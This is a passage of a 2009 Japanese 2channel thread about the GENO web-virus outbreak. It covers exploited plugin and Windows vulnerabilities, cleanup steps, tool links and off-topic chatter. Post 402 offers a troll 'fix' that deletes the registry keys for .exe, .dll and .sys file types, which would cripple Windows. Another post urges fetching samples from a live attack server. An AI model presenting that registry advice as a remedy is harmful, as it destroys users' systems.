09/06/01 21:18:46 B9YOsgHE0 BE:2087410897-2BP(0)
おっとあっちに書いてしまった どっちでもかまわんが、どっちかに固めるつもりだった
スレリンク(sec板:575番)
356:192.168.0.774
09/06/01 21:55:31 B9YOsgHE0 BE:894604493-2BP(0)
MS06-014 KB911562 (MDAC)
MS06-057 KB923191 (WebViewFolderIcon)
MS06-067 KB922760 (WinZip, killbit)
MS09-002 KB961260 (IE7)
QuickTime: わからんが、2007年には出現していた手口の様子
…MS09-002 以外、なんか古いやつばっかり…本命じゃないの掴まされたかな
てきとーにスクリプト読み直してみるか
357:192.168.0.774
09/06/01 23:21:23 gRaxrwT0P
MS06-014は常連だなあ
358:192.168.0.774
09/06/03 15:08:36 3dZzweiq0
Acrobat,Flash,QTとかの類は全部アンインストールして
Javascript切るしかないな
359:192.168.0.774
09/06/03 15:13:30 2xEHinnPP
終息したみたいだね
360:192.168.0.774
09/06/03 15:24:36 5t7XiWC30
出遅れたけど聞いておこう。
ffdshowみたいなコーデック集にも、同じ脆弱性あるのかな?
361:192.168.0.774
09/06/03 15:36:24 U4wE4RiO0
なんという無意味な問いだ
広い意味では同じ脆弱性があるとも言えるが
狭い意味では同じ脆弱性があるわけないだろ
362:192.168.0.774
09/06/03 23:44:13 /fJlB1oR0
偽サイトにユーザーをリダイレクトするコードが蔓延--ウェブセンスが警告
URLリンク(japan.cnet.com)
363:192.168.0.774
09/06/04 20:51:18 ovRMQuOx0
>>209 とりあえずは塞がれたらしい。
iPhone OS 3.0対応の「iTunes 8.2」公開、「QuickTime 7.6.2」も
URLリンク(internet.watch.impress.co.jp)
364:192.168.0.774
09/06/04 21:14:00 ek6ha3Fn0
でもDirectShowの脆弱性が解決してないので
QuickTime関連がヤバイ現状には変化なしw
365:192.168.0.774
09/06/04 22:17:47 9yOhj3HV0
それはQTではなくDXの問題
それにウェブブラウジング中にDX動かすなんてのもないと思う
366:192.168.0.774
09/06/04 22:48:03 ASeSs5VK0
QuickTime側入れ替えても解決しない問題箇所だからね。
367:192.168.0.774
09/06/04 23:39:31 fBOkvqee0
まぁ、QTが対策されたことによって、webから直接DirectShowの穴叩くのは難しくなったか
368:192.168.0.774
09/06/04 23:57:02 yg7JUHlK0
>>364-366で指摘してるDirectShowの問題って
URLリンク(internet.watch.impress.co.jp)
の事だよな?
DirectShowのファイルオープンってフィルタ・スプリッタ経由でやってるはずで、
QT用フィルタ・スプリッタが無ければQT開くもヘッタクレも無いはずだから、
これはQT用フィルタ・スプリッタのバグで起きてる問題だと見るべきだよな。
・・・素直にDirectShow用QTコーデックのバグって書いて欲しい。
そうすると、改変QTファイルをDirectShow利用プログラム経由でQT用フィルタ・スプリッタに通すと発症するって事になる。
で、DirectShow用QTコーデックのバグには>>363では触れられてない。
>>367
なので全く難しくなってません。
そもそもQTPlayerでは自前でデコードするだろうから、QTPlayerでQT開く時には元々発症しないんじゃないかな。
369:192.168.0.774
09/06/05 00:22:27 wJ6nVbq00
要するに、脆弱性の解決したQTプレイヤーの最新版を入れて
それでQTファイルを開く分には問題ないってこと?
370:192.168.0.774
09/06/05 00:53:14 geb9McX00
大昔、QuickTimeを、Windowsのメディアプレーヤで再生できた時期があったんだよ
そのときの名残が、最近ではWindows同梱のquartz.dll ってのにあって、そこが問題になってる
アンチAppleにはどっちにしたってむかつく話だろうが、とりあえずQuickTime更新しても、
MSが修繕して、アップデートしてくれるまでは、こっちは直らないわけだな
371:192.168.0.774
09/06/05 01:13:28 SMLB9Vzg0
誰が使ってるのかわからないような機能がいちばん危険だよな。
372:192.168.0.774
09/06/05 01:50:42 geb9McX00
PDFもそう。確かに、分野によっては欠かせないものだが、それ以上に幅広く、
無駄にPCにプレインスコされて出荷され、そのまま死蔵になってる
回線がしっかりしてれば、いるときに落としてくればいいと思うんだけどな
とはいっても、いざというときに目を通したことにしておいてくださいという
周辺機器の説明書がPDFだと、どうしてもリーダも同梱になっちまう
373:192.168.0.774
09/06/05 01:57:08 VdpfbXko0
大昔に入れたクイックタイムおるたなんとかが入れっぱなしになってるんだが
消したほうがいいのかな
374:192.168.0.774
09/06/05 02:00:01 kF2EDitC0
>>372
んだんだ。
周辺機器のマニュアルの類はpdfであることが多いよな。
ルータも無線カードもMOも外付けHDDも複合機も、
更にメーカー製だとバンドルソフトのマニュアルまでもがpdfだったり。
375:192.168.0.774
09/06/05 02:45:18 eYXhsJxW0
>>373
QuickTimeムービーを再生することがないなら消せばいい。
再生することがあるなら最新版に更新しておけ。
376:192.168.0.774
09/06/05 03:00:29 6SIDmEC50
ある程度の普及率を持つソフトウェアは全て
・最新バージョンチェック機能つきインストーラ
→CDに同梱する場合等、オフライン環境にもインストールが可能であり、オンライン環境ならば最新版をインストールできるのが望ましい
・実装上再セットアップであってもそれを意識させないオンラインアップデート機能
→インストーラのダウンロードまでしか面倒を見ない物だと、入れるのが億劫になって無視しがち
・明確なスケジュール・トリガのあるアップデートチェック機能
→いくら修正しても、アップデート通知が出なかったりしたら意味ないですよ、Adobeさん、Symantecさん。
を持っていてくれないと危なっかしくてしようが無い
・・・と思う。
コーデックみたいなプラグイン系はちょっと難しい所があるのが難だが・・・
起動時にアップデータをRunOnceに放り込むとかで常駐無しに安全性を確保することも不可能じゃないのにな。
377:192.168.0.774
09/06/05 03:32:03 geb9McX00
アップデートするモチベがない
アップデートすると、重くなる(かも?って勝手な予想するのも含む)となると、余計アップデートしない
せめて、オフライン版は、ブラウザにプラグイン入れない。とか。w
腐ったファイルをメールに添付して踏ませるのには無効だが、ブラウザ経由でってのは減らせそう
378:192.168.0.774
09/06/05 09:19:48 jt2tl6gS0
wmv呼び出すようにwebに貼り付けて、細工したqt再生するようにしておけばイケるのか
まぁ、Win7への移行が進めばASLRが効くから、この手の問題はおおよそ解決するんじゃないかな
あとは、携帯みたいに、機種毎に微妙に仕様違っていて、影響範囲が限定的になるとか。
そうやって考えると、数年前にASLR実装して、マイナー違いだらけのLinuxってすげぇよなとか思ったり。
379:192.168.0.774
09/06/05 11:02:29 9oazRdMR0
>>370
quartz.dll の役割を今初めて知ったよ
WM機にもそのファイルあるんだけどさ
380:192.168.0.774
09/06/05 15:20:40 geb9McX00
>>379
quartz.dll が、そのQuickTime(それも旧形式)だけをみてるんなら、あぼんすればおしまいなんだけど、
他にもいろいろ基盤的な処理をしてるDLLなので、一概にそうもできないわけね
IEとかと同様、どうしてもバグフリーにできない複雑なコンポーネントだから、ビジネス用途の端末とか、
動画とか一切いらないPCなら、あぼんしとけばいいかも 実際にそういう攻撃遮断策も紹介されてる
だいたい、そうゆうもん
381:192.168.0.774
09/06/05 16:41:00 5sVAYN+A0
>>376
あとは ADM とか配布して組織内で集中管理出来るようにしてほしいね。
382:192.168.0.774
09/06/06 14:59:57 izh1au960
これってどうなの?
URLリンク(www.mcafee.com)
383:192.168.0.774
09/06/06 16:42:22 Xz0CFMXE0
これからもGENOと似たようなウイルスが普通に蔓延する模様
「Baladen」による大規模サイト改ざん、コード難読化で検知回避
URLリンク(internet.watch.impress.co.jp)
384:192.168.0.774
09/06/06 17:41:02 lqce6X1B0
>>382 ちょっと見ないうちに、こんなに便利になってたのか。あとでみてみる
385:192.168.0.774
09/06/06 19:10:19 lqce6X1B0
落としてみた。これは便利かもしれん sysinternal好きなら気に入るとおもわれ
386:192.168.0.774
09/06/07 02:02:38 M7AHivT40
sysinternal好きならっていうか、sysinternalそのものだよな
387:192.168.0.774
09/06/07 07:34:05 RGnVDoX80
sysinternal好きなら、sysinternalでなんとなーくそろえるでそw そゆ意味
388:192.168.0.774
09/06/07 09:50:33 2PGpvmxT0
>>382,>>385-386
使ってみた。結果は Possibly Infected: ....0。
sysinternalのことは浅学非才の身なので知らない。
389:192.168.0.774
09/06/07 14:48:04 1hLnbE2g0
>>388
sysinterna社ってのが以前存在してWindowsの管理用ツールを販売、一部無料公開してた
それをMicrosoftが買収して、元sysinternalのフリーダウンロードページがMicrosoftの一コンテンツとなってる
アップデートもされてるっぽいからとりあえず全部おとしてURLをBMしとくといいよ
390:388
09/06/07 17:11:33 2PGpvmxT0
>>389
ご親切なレスに感謝!
おかげさまで、すぐたどり着けました。
Sysinternals ホーム
URLリンク(technet.microsoft.com)
Sysinternals ダウンロード
URLリンク(technet.microsoft.com)
とても参考になります。ありがとうございます。
391:192.168.0.774
09/06/10 02:51:41 F4oni6Pd0
類似動作の新型の情報がようやく出はじめましたね。
どこの方かは存じませんが、解説している人、乙であります。
URLリンク(jvnrss.ise.chuo-u.ac.jp)
392:192.168.0.774
09/06/10 21:05:59 /rWKXzaA0
今回のreader(9.1.1)更新も
>adobe readerを開いて ヘルプ→アップデートの有無をチェック
でおkスか?
393:192.168.0.774
09/06/10 21:13:50 /rWKXzaA0
↑すんません、アップデートしました。
394:192.168.0.774
09/06/11 01:28:02 Imp2Uwco0
>>392-393
おk。そして、9.1.2への更新な。
395:192.168.0.774
09/06/11 17:18:29 uOndiU0l0
adobe readerが9.1.2になった
396:192.168.0.774
09/06/11 21:49:28 jMVQpTl20
>>395
チラシの裏に書いてろクズ
397:192.168.0.774
09/06/11 23:04:12 9O3T7NN/0
>>396
URLリンク(www.youtube.com)
398:192.168.0.774
09/06/12 01:00:05 qtX3J3f5O
何これ?
399:192.168.0.774
09/06/13 00:10:50 7Q2x+i690
GENOウイルスのサイト改ざん被害、国内で400件以上確認される
URLリンク(internet.watch.impress.co.jp)
400:192.168.0.774
09/06/13 10:17:18 t6zoMOJ60
これは酷い
401:192.168.0.774
09/06/13 22:22:05 3M+6Njb90
1.regeditが直接起動しないので、ファイル名指定でcommandを実行、DOS窓を出す。
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起動
このもっと詳細なやり方教えて下さい。
402:192.168.0.774
09/06/13 22:27:03 yW44nLjk0
>>401
そんなことしなくても
レジストリエディタを開いて、以下のキーを全て削除して、再起動でおk
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
403:192.168.0.774
09/06/13 22:50:21 olk3r39Z0
>>401
人に質問しながらでないとできないなら復旧はまず不可能。
素人に簡単に駆除できるようならこんなに問題にはならんからな。
黙って再インストールしてくれ。
404:192.168.0.774
09/06/13 22:57:34 ARaQrfiq0
>>401
>>382
405:192.168.0.774
09/06/14 00:59:16 C/M8+vVy0
このスレは、初心者サポート期間は終了しましたので
406:192.168.0.774
09/06/14 19:12:44 EPArmPcM0
1.regeditが直接起動しないので、ファイル名指定でcommandを実行、DOS窓を出す。
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起
5の 正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
の詳しいやり方おしえて
407:192.168.0.774
09/06/14 20:02:46 /NaUDULu0
しつこいな
408:192.168.0.774
09/06/14 20:12:05 EsGyl6A+0
>>406 クリーンインストール
409:192.168.0.774
09/06/14 20:12:49 o1wDCDqN0
エロサイト見た後でブラウザ閉じたら、いつの間にか別にウィンドウが開いていて
こんな不明なサイトが見つかりますた
わたすは大金持ちになったのですかそうですか
URLリンク(www.freelotto.com)
410:192.168.0.774
09/06/14 20:54:11 EsGyl6A+0
で、それがGENOと何の関係が?
411:192.168.0.774
09/06/14 23:01:31 9CFoS/uv0
スレないにGENOウイルス駆除ツールに関するリンクが貼られているというのに>>406は何なんだ?
412:192.168.0.774
09/06/15 09:33:14 KVqrUa+P0
だからもう、助けてクレクレは、【いぢったりしないで】スルーしようぜ
外付けブートできるヤツくらい、リアルにひとりやふたりいるだろ
今回は同梱されてなかったが、ルートキットくらい、自分で始末しろ。
いまこのスレは、そういうレベルに戻ってる
面倒見のいいヤツは流出したんだ。あいつらは流動してる。(それでいいけど)
そして、周辺に大規模感染があれば、またふらりと戻ってくる
413:192.168.0.774
09/06/15 20:47:44 t5CdTQZr0
パソコン一台でも普段はウイルス対策をしっかりやったwindows
ネットサーフィンのときはLinux系を使えばGENOと同じ感染プロセスのウイルスは防げるのかな?
414:192.168.0.774
09/06/15 20:53:55 KVqrUa+P0
インターネッツライフをLinux系で賄えるなら、いまんとこかなりの脅威は回避できる
Macですらかなり間に合うのに、Linuxならしばらく安泰
お約束で触れておくなら、ソーシャルハック系(騙されて垢を奪われる)はLinuxだろうと防げない
死角はゼロにならないので、露出狂にならんようにw
415:192.168.0.774
09/06/15 23:30:35 HQGGj4ptP
終息した?
416:192.168.0.774
09/06/15 23:44:36 8i7xfZWb0
>>415
氏ね
能無し
417:192.168.0.774
09/06/16 08:40:55 x4DnqVnv0
何突然興奮してるんだろ
418:192.168.0.774
09/06/16 13:58:05 IgQj6kkj0
潜伏期間が過ぎて発症したんだろ。
419:192.168.0.774
09/06/17 09:49:16 mVglo+DJ0
「PDF」ウイルス、アダルトサイトに仕掛けられる―G Data が報告 (インターネットコム)
URLリンク(news.www.infoseek.co.jp)
これって関係ある?
420:192.168.0.774
09/06/17 10:24:46 JPvfv0Nw0
似てれば似てると書くと思うんだよな
日頃のこつこつとした対策が重要なのは共通。
このまま、随所のGENO系ウイルススレは、大規模webウイルススレになっていくのかな
ちなみに、GENOと名がついていて、GENO(店舗)のことを扱ってるのは除くと、主なところで
・ここ
・同人板
・セキュ板
・女向ゲー一般板
・パソコン一般板
・同人ゲーム板
・ネットwatch板
にスレがある様子(find.2ch.net検出順)。
421:192.168.0.774
09/06/17 11:22:35 wFOzdNIP0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ ★21 [セキュリティ]
乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
【明光○塾】女子中学生の生徒と淫行三昧★178【講師たかゆき】 [ニュース議論]
【明光○塾】女子中学生の生徒と淫行三昧★177【講師たかゆき】 [ニュース議論]
422:192.168.0.774
09/06/17 16:25:35 6ER87SJA0
GENOより強力な新型が出現したみたいだけど
これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの?
↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓
URLリンク(japan.cnet.com)
<抜粋>これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。
実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、
通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが
アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には
ウイルスをロードしてしまう。
423:192.168.0.774
09/06/17 23:17:23 cNPieBDU0
悩むくらいならReaderごとアンインスコしたほうがいい
424:192.168.0.774
09/06/18 12:57:44 oSNBi7b+0
今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ(米セキュリティ企業公表)
URLリンク(www.virustotal.com)
425:192.168.0.774
09/06/19 12:42:57 1dktemNX0
“けん"を変換すると“ロン"が出るんだけど、これって何かある?
代わりに“ケン"が出ない
(一文字ずつなら出せるけど)
GENOはこのまえ症状がそっくりでリカバリしたけど、セキュリティは前のままなんで
426:192.168.0.774
09/06/19 13:31:32 PsMl7UOK0
そういうの、あるよ。
GENOが流行るずっと前から、特定の単語を打ち込むと、
全然関係ない単語に変換されちゃうの。
気持ち悪いけど、人に言う分には面白いし直し方分からんから放置してる。
427:192.168.0.774
09/06/19 14:04:26 l7tIMz7M0
>>425
前のままじゃダメだと自覚があるならそこを直せばいいのに
428:192.168.0.774
09/06/19 17:13:02 1dktemNX0
じゃあマザーボードがおかしいのかもしれんな
>>427
やっぱねウィルスソフトもねアホらしいしね、1年くらいなら最新入れんでも大丈夫な気がするじゃん
去年の11月に更新終了して、今年の終わりにノートン2010だっけ?出たら買おうかと思ってる
429:192.168.0.774
09/06/19 22:01:56 l7tIMz7M0
なんだ釣りだったのか
430:192.168.0.774
09/06/19 22:24:10 EWSkSKSu0
>ウィルスソフト
この時点で釣り決定
431:192.168.0.774
09/06/22 13:12:26 OFcMMviC0
GENOウイルススレ ★22
スレリンク(sec板)
432:192.168.0.774
09/06/22 13:13:45 Qff0AEDv0
アフィは許せる(スルーするだけだ)が、こんなにそこいら中に次スレはいらんぞw 消化していこうぜ
433:192.168.0.774
09/06/22 13:17:35 UL1vSPoA0
めいめいすきなところに移動汁
434:192.168.0.774
09/06/22 13:20:15 UL1vSPoA0
途中送信してしまった
セキュ板994の人が「めいめいすきなところに移動汁」
つってんだから好きなところに書き込めばいいんじゃね
435:192.168.0.774
09/06/22 21:51:07 zjMZOGeY0
いらないって言われてるのに立てるとか…
436:192.168.0.774
09/06/22 22:00:03 n9xFzxJy0
誰も書き込まなければそのうち落ちるんじゃね
初質板の鑑定スレみたいに双方がアラシ呼ばわりする事態だけは避けてほしいが
437:192.168.0.774
09/06/22 22:48:53 WFTQ6v550
そういえばあったな。向こうはIDでないとかで
438:192.168.0.774
09/06/22 23:05:58 n9xFzxJy0
まぁ、ここの人たちはIDなくても見分けつく人が多いから大丈夫だと思うけどね
対立を演出したいやつにウイルスコード貼られてもスルーしてるし
439:192.168.0.774
09/06/23 04:14:43 aGFOinC00
真するできないねえ
440:192.168.0.774
09/06/23 06:22:28 etrZRzT30
└(゚∀゚└)真する!真する!!(┘゚∀゚)┘ 真する!真する!! (:D)| ̄|_
441:192.168.0.774
09/06/23 06:28:16 87zUBhtd0
わけのわからないAA貼り付けてごまかそうとしても無駄だよ!!!!
もう一度確認しておこう。
テクノの元祖はスナインコッコスマナラコッサーラ長老。
442:192.168.0.774
09/06/23 06:31:32 etrZRzT30
(´;ω;`) (´;ω;:;.:... (´;:;.:.:;.:... .:.:;.:......
443:192.168.0.774
09/06/24 11:19:53 thH4Vr8L0
>>432
>アフィは許せる(スルーするだけだ)
もともとGENOチェッカーの精度が問題だって話だったのに
いつのまにアフィが焦点になったんだって希ガス O o。(´Α`)
444:192.168.0.774
09/06/24 21:30:38 qVqYmhkg0
テンプレ勝手に変えるから
445:192.168.0.774
09/06/24 22:44:50 kaNkJ5AZ0 BE:530136544-2BP(0)
>>443
ともあれ手を動かすって考えには賛同してる 失敗を恐れるのが普通だし、これがなかなかできない
やるなら、精度向上を続けるとか、停止するその日まで(削除ではなく、跡地にすればいいと思う)、
サポートを続けないととは思うけどね
446:192.168.0.774
09/06/24 22:46:48 kaNkJ5AZ0
…ただし、一般論として、人の不幸を、直接小銭の種にしようってのは、
受け入れられるか否か、文化によるかなと
447:192.168.0.774
09/06/24 22:59:37 qVqYmhkg0
あのサイトそのものにはべつになんのアレも無い。スキにすればいい
テンプレ勝手に変えてwikiなんかのリンク外ス奴がでなきゃね
>wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
本人じゃないでしょさすがに
448:192.168.0.774
09/06/24 23:15:52 eGt3q4yV0
>信憑性に欠き
ひどい日本語だ
449:192.168.0.774
09/06/25 03:35:49 8ZyQJlBp0 BE:397602162-2BP(0)
うまく言えないな、、 直接小銭の種にしようとしてるかはわからないし、
直接小銭の種にしようとしてるとみなされるかどうかもわからない。
このまま、日本がターゲットに選ばれなければいいなと。なんとなく。
450:192.168.0.774
09/06/25 21:45:01 N/dc4Nk50
……。
451:192.168.0.774
09/06/25 21:58:12 CiB5GY6i0
406 名前: ◆XcxlmnqGqU [sage] 投稿日:2009/05/30(土) 19:57:35
>>403
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません
>>404
雑魚は黙ってなさい
495 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 17:31:04
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
スレリンク(operate板)
XcxlmnqGqU 192-319 424
499 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/31(日) 18:10:08
運営スレであんだけファビョって
インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて
今度は何をしてくれるのかな
646 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/06/04(木) 16:25:44
★同人新スレにアフィが追加されました!
【報告専用】同人サイト向け・GENOウィルス注意11
スレリンク(doujin板)
452:192.168.0.774
09/06/25 22:29:39 u/8UXvhn0
>>451
一個目、何度見てもジワジワくる
453:192.168.0.774
09/06/26 03:04:11 wSR8F7l40
皮肉屋ですね(笑)
454:192.168.0.774
09/06/26 03:05:03 5xv1P6lY0
>>451の話はJavaのところが問題なのにな
455:192.168.0.774
09/06/26 04:21:57 wSR8F7l40
そ、そうですね A^-^;)
456:192.168.0.774
09/07/02 00:36:56 lL97EwEVP
このウイルス思ったけど被害がなかったようだね
おまえらに釣られて騒ぎすぎたぜ
457:192.168.0.774
09/07/02 14:11:39 dPCiJwkr0
>>456
騒いだからサイト閉じられて被害が少なかったとは思えんのか?
458:192.168.0.774
09/07/02 16:08:14 XV4YJu590
被害あったってゾンビになっちゃったかもしれないやつらは気づいてないだろ
459:192.168.0.774
09/07/02 19:55:54 DAKHPjSE0
それに感染に気付いていても、サイト持ちじゃないから実害ないし
このままでもいいよね的なカキコをしてた奴が複数いた事を考えると
自覚していながら放置組も相当いるかも知れない。
そしてそれらPCがボットネットに組み込まれているであろう事を思えば。。。
後で「実は抜かれてるのは個人情報もでした」となったら阿鼻叫喚かもな。
460:192.168.0.774
09/07/02 20:03:21 hEHmcCZ90
データ破壊系ではないウイルスなら個人情報を抜かれるかも
と考えると思うんだが、実害ないしいいやと思えるのがわからん
461:192.168.0.774
09/07/02 21:10:06 rR8NeVNy0
そんなやついんの
462:192.168.0.774
09/07/02 21:52:57 HR77S6HE0
いるよ。「WinPCでネットやってりゃ多少なりともウイルス飼ってるのが普通」
ぐらいのこと、平気で言うやついるし
463:192.168.0.774
09/07/02 22:37:03 1AbxG1a50
GENO全盛期に
「ネットで買い物しないしPCメールしないし個人情報無いから別に感染してもいいや」て言われた
464:192.168.0.774
09/07/02 23:42:59 rR8NeVNy0
クッキーごときを検出しまくったへいがい
465:192.168.0.774
09/07/03 03:56:49 EjGCdy4A0
>>462-463
いたね、そういう人。言われた人はホントお気の毒だった
ネットやっててウイルスに感染する覚悟を持つことと
ウイルス貯蔵庫兼配給部隊になることとは別問題のはずなのに
前に女向ゲー一般GENOスレで見たネット版「腸チフスのメアリー」
そんな人がゴロゴロしてるんだろうな
466:192.168.0.774
09/07/03 08:24:53 TmNzMHZD0
本人にその意思がなくても、第三者に電子計算機を利用され、
他者の電子計算機器等に障害を発生もしくは破壊行為を行った場合、
○○万円以下の罰金もしくは懲役○○年に処す
くらいの法律がないと、「俺は悪くない」で済んじゃうからな。
現段階では、プロパイダが責任を持って通信遮断を行うことになってるんだっけ?
467:192.168.0.774
09/07/03 09:45:50 F0OTa+om0
いづれパソコンも免許がいるようになる
バカはパソコンを使えない時代が来るってこったw
468:192.168.0.774
09/07/03 18:22:00 EjGCdy4A0
>>466
URLリンク(internet.watch.impress.co.jp)
愚痴らし
なんか無茶鰤がすぎるんですけど
469:192.168.0.774
09/07/03 21:16:59 mm3IBTQg0
たしかに、そういうこと熟知してる者のレスに見えるな
そういや前スレでも法に精通した香具師がいたが、お仲間か
470:192.168.0.774
09/07/04 15:39:06 eC8cizyU0
ムチャ振り(・A ・)イクナイ!
せめて釣り氏さんみたいに誘い受けにとどめれ
と言いたいところだが、>>466のは普通に質問
なんでもかんでも自分へのレスだと思い込むのは
2ch初心者がよく陥る罠。それを諫めるために有名な
「2chにはひろゆきと俺とお前だけ」のコピペがある
471:192.168.0.774
09/07/04 16:20:10 tMN9XWSy0
てか実際、2chにはつーかネットの中には
オレとオマエとひろゆきだけ
472:192.168.0.774
09/07/04 17:33:15 mOYjbOaL0
全部俺の自演
473:192.168.0.774
09/07/04 18:41:54 eC8cizyU0
ぶっちゃけ世界には、おれとおまえと
ひろゆきだけ。後は全部おれのスタンド
474:192.168.0.774
09/07/04 19:23:52 tMN9XWSy0
ひろゆきさんはどこまでもついてくるんですね(笑)
475:192.168.0.774
09/07/04 19:27:53 eC8cizyU0
そりゃオマ、ひろゆきは…
おや?こんな時間に誰か来たようだ
476:192.168.0.774
09/07/04 20:58:27 VfNAT2grP
477:192.168.0.774
09/07/07 10:31:14 O20iNlf+0
関連: ばりゅどめたんに埋め込みスクリプトあらわる
ばりゅどめ側は駆除済みだが、顛末が読める
攻撃鯖は生存中 検体クレクレたん(俺含む)は急げ
VALUE DOMAINってどうよ? part33
スレリンク(hosting板)